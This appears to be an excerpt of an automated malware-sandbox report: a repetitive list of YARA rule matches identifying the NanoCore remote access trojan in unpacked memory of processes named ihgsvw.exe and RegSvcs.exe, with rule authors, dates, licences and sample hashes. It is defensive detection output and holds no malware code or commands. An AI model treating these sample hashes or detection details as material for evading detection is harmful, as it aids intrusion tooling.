      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
